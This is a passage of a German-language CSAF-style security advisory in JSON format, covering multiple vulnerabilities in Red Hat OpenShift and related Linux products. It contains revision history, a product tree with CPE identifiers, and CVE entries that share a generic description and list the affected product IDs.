"date": "2024-07-15T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-07-25T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-07-29T22:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-08-13T22:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2024-08-20T22:00:00.000+00:00",
"number": "17",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-08-21T22:00:00.000+00:00",
"number": "18",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-09-12T22:00:00.000+00:00",
"number": "19",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-09-18T22:00:00.000+00:00",
"number": "20",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-09-25T22:00:00.000+00:00",
"number": "21",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-03T22:00:00.000+00:00",
"number": "22",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-23T22:00:00.000+00:00",
"number": "23",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-30T23:00:00.000+00:00",
"number": "24",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-06T23:00:00.000+00:00",
"number": "25",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-11T23:00:00.000+00:00",
"number": "26",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-20T23:00:00.000+00:00",
"number": "27",
"summary": "Neue Updates von Ubuntu aufgenommen"
}
],
"status": "final",
"version": "27"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Amazon Linux 2",
"product": {
"name": "Amazon Linux 2",
"product_id": "398363",
"product_identification_helper": {
"cpe": "cpe:/o:amazon:linux_2:-"
}
}
}
],
"category": "vendor",
"name": "Amazon"
},
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "T035142",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "Red Hat Enterprise Linux 9",
"product_id": "T038901",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:9"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "Secondary Scheduler Operator",
"product": {
"name": "Red Hat OpenShift Secondary Scheduler Operator",
"product_id": "T027759",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:::secondary_scheduler_operator"
}
}
},
{
"category": "product_version",
"name": "Kube Descheduler Operator 5",
"product": {
"name": "Red Hat OpenShift Kube Descheduler Operator 5",
"product_id": "T033270",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:kube_descheduler_operator_5"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift",
"product": {
"name": "Red Hat OpenShift",
"product_id": "T035034",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:-"
}
}
},
{
"category": "product_version_range",
"name": "Migration Toolkit for Applications \u003c7.0.3",
"product": {
"name": "Red Hat OpenShift Migration Toolkit for Applications \u003c7.0.3",
"product_id": "T035036"
}
},
{
"category": "product_version",
"name": "Migration Toolkit for Applications 7.0.3",
"product": {
"name": "Red Hat OpenShift Migration Toolkit for Applications 7.0.3",
"product_id": "T035036-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:migration_toolkit_for_applications__7.0.3"
}
}
},
{
"category": "product_version",
"name": "Custom Metric Autoscaler 2",
"product": {
"name": "Red Hat OpenShift Custom Metric Autoscaler 2",
"product_id": "T035047",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:custom_metric_autoscaler_2"
}
}
},
{
"category": "product_version",
"name": "Network Observability 1.6",
"product": {
"name": "Red Hat OpenShift Network Observability 1.6",
"product_id": "T035431",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:network_observability_1.6"
}
}
},
{
"category": "product_version",
"name": "GitOps 1.12",
"product": {
"name": "Red Hat OpenShift GitOps 1.12",
"product_id": "T035679",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:gitops_1.12"
}
}
},
{
"category": "product_version",
"name": "Run Once Duration Override Operator 1",
"product": {
"name": "Red Hat OpenShift Run Once Duration Override Operator 1",
"product_id": "T035698",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:run_once_duration_override_operator_1"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.16.8",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.16.8",
"product_id": "T036959"
}
},
{
"category": "product_version",
"name": "Container Platform 4.16.8",
"product": {
"name": "Red Hat OpenShift Container Platform 4.16.8",
"product_id": "T036959-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.16.8"
}
}
},
{
"category": "product_version_range",
"name": "for Windows Containers \u003c10.15.3",
"product": {
"name": "Red Hat OpenShift for Windows Containers \u003c10.15.3",
"product_id": "T036993"
}
},
{
"category": "product_version",
"name": "for Windows Containers 10.15.3",
"product": {
"name": "Red Hat OpenShift for Windows Containers 10.15.3",
"product_id": "T036993-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:for_windows_containers__10.15.3"
}
}
},
{
"category": "product_version",
"name": "CodeReady Workspaces",
"product": {
"name": "Red Hat OpenShift CodeReady Workspaces",
"product_id": "T037618",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:codeready_workspaces"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.14.38",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.14.38",
"product_id": "T037940"
}
},
{
"category": "product_version",
"name": "Container Platform 4.14.38",
"product": {
"name": "Red Hat OpenShift Container Platform 4.14.38",
"product_id": "T037940-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.14.38"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2020-26555",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2020-26555"
},
{
"cve": "CVE-2021-25220",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2021-25220"
},
{
"cve": "CVE-2021-29390",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2021-29390"
},
{
"cve": "CVE-2021-43618",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2021-43618"
},
{
"cve": "CVE-2022-0480",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-0480"
},
{
"cve": "CVE-2022-2795",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-2795"
},
{
"cve": "CVE-2022-3094",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-3094"
},
{
"cve": "CVE-2022-38096",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-38096"
},
{
"cve": "CVE-2022-40090",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-40090"
},
{
"cve": "CVE-2022-45934",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-45934"
},
{
"cve": "CVE-2022-48554",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-48554"
},
{
"cve": "CVE-2022-48624",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2022-48624"
},
{
"cve": "CVE-2023-24023",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-24023"
},
{
"cve": "CVE-2023-25193",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-25193"
},
{
"cve": "CVE-2023-25775",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-25775"
},
{
"cve": "CVE-2023-26159",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-26159"
},
{
"cve": "CVE-2023-26364",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-26364"
},
{
"cve": "CVE-2023-28322",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-28322"
},
{
"cve": "CVE-2023-28464",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-28464"
},
{
"cve": "CVE-2023-28866",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-28866"
},
{
"cve": "CVE-2023-2975",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
